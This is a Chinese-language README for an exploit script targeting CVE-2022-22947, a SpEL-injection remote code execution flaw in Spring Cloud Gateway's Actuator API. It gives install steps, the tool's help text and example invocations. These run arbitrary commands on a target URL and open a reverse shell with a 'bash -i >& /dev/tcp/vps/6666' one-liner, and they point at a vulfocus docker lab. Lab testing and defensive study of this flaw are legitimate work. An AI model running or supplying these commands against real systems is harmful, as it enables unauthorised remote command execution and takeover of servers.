Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
1.installation
pip3 install -r requirements.txt
2.Usage
$ python3 spring-cloud-gateway-rce.py -h
___ __ ____ ___ ____ ____ ____ ____ ___ _ _ _____
/ __\ /\ /\ /__\ | ___ \ / _ \ | ___ \ | ___ \ | ___ \ | ___ \ / _ \ | || | | ___ |
/ / \ \ / / /_\ _____ __) || | | | __) | __) | _____ __) | __) || (_) || || | _ / /
/ /___ \ V / //__ | _____| / __/ | | _| | / __/ / __/ | _____| / __/ / __/ \_ _, || __ _| / /
\_ ___/ \_ / \_ _/ | _____| \_ __/ | _____|| _____| | _____|| _____| /_/ | _| /_/
CVE-2022-22947 Spring Cloud Gateway RCE
By:K3rwin
usage: spring-cloud-gateway-rce.py [-h] [-u URL] [-c CMD] [-s SYSTEM]
Spring Cloud Gateway RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-c CMD, --cmd CMD 指定执行的命令,默认执行whoami
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
3.example
① -u 探测漏洞
python3 spring-cloud-gateway-rce.py -u " http://192.168.50.111:8080/"
② -c 指定执行命令
python3 spring-cloud-gateway-rce.py -u " http://192.168.50.111:8080/" " ip add"
③ 反弹shell
python3 spring-cloud-gateway-rce.py -u " http://192.168.50.111:8080/" " bash -i >& /dev/tcp/vps/6666 0>&1"
docker靶场vulfocus
109 Dec 28, 2022
1 Nov 17, 2021
42 Dec 01, 2022
500 Jan 06, 2023
15 Feb 21, 2022
384 Dec 23, 2022
89 Jan 01, 2023
70 Jun 21, 2022
129 Dec 30, 2022
4 Dec 23, 2021
37 Nov 09, 2022
171 Nov 28, 2022
8 Dec 20, 2022
9 Nov 09, 2022
34 Nov 15, 2022
7 Dec 08, 2022
1 Jan 03, 2022
16 Dec 30, 2022
580 Jan 09, 2023
1 Dec 09, 2021